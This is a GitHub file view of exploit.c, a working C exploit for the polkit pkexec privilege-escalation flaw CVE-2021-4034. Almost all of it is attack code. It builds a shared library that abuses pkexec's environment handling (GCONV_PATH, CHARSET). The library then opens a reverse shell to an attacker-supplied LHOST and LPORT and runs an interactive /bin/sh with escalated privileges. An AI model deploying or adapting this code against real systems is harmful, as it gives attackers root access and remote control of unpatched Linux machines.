-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.c
120 lines (110 loc) · 2.68 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
/*
* Exploit Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
* https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
*/
#include <stdlib.h>
#include <error.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#ifndef NDEBUG
# define dbg(...) \
error_at_line(EXIT_SUCCESS, errno, ": " __FILE__, __LINE__, __VA_ARGS__)
#else
# define dbg(...) \
do {} while (0)
#endif
/*
* Add .interp section and permit shared library execution
* https://stackoverflow.com/a/68339111/14760867
*/
const char so_loader[] __attribute__((section(".interp"))) = SO_LOADER;
/*
* Interactive shell with privilege escalation
*/
static inline void run_shell()
{
char *const argv[] = {"/bin/sh", "-i", NULL};
char *const envp[] = {
"PATH=/usr/local/sbin"
":/usr/local/bin"
":/usr/sbin"
":/usr/bin"
":/sbin"
":/bin",
"TERM=xterm",
NULL,
};
uid_t euid = geteuid();
setreuid(euid, euid);
setregid(euid, euid);
execve(argv[0], argv, envp);
}
/*
* Reverse shell
*/
extern void gconv_init()
{
unsigned ntry = 5;
int sockfd = EXIT_FAILURE, rc = EXIT_FAILURE;
const struct addrinfo hints = {
.ai_family = AF_UNSPEC,
.ai_socktype = SOCK_STREAM,
.ai_protocol = IPPROTO_TCP,
};
struct addrinfo *res = NULL;
// init res->ai_addr and res->ai_addrlen
rc = getaddrinfo(LHOST, LPORT, &hints, &res);
if (rc != 0) {
dbg("getaddrinfo %s", gai_strerror(rc));
exit(EXIT_FAILURE);
}
sockfd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
if (sockfd == -1) {
freeaddrinfo(res);
dbg("socket");
exit(EXIT_FAILURE);
}
// try to establish connection with attacker
do {
rc = connect(sockfd, res->ai_addr, res->ai_addrlen);
if (rc == 0) {
dup2(sockfd, STDIN_FILENO);
dup2(sockfd, STDOUT_FILENO);
dup2(sockfd, STDERR_FILENO);
run_shell();
dbg("run_shell");
break;
}
dbg("connect " LHOST ":" LPORT);
sleep(1);
} while (--ntry > 0);
freeaddrinfo(res);
close(sockfd);
exit(EXIT_FAILURE);
}
extern void gconv()
{
// nop
}
#define PKEXEC "/usr/bin/pkexec"
/*
* Shared library execution entry point
* Must be linked with --entry=so_main
*/
extern void so_main()
{
char *const argv[] = {NULL};
char *const envp[] = {
SO_NAME,
"PATH=GCONV_PATH=.",
"CHARSET=" SO_NAME,
"SHELL=" SO_NAME,
NULL,
};
execve(PKEXEC, argv, envp);
dbg("execve " PKEXEC);
exit(EXIT_FAILURE);
}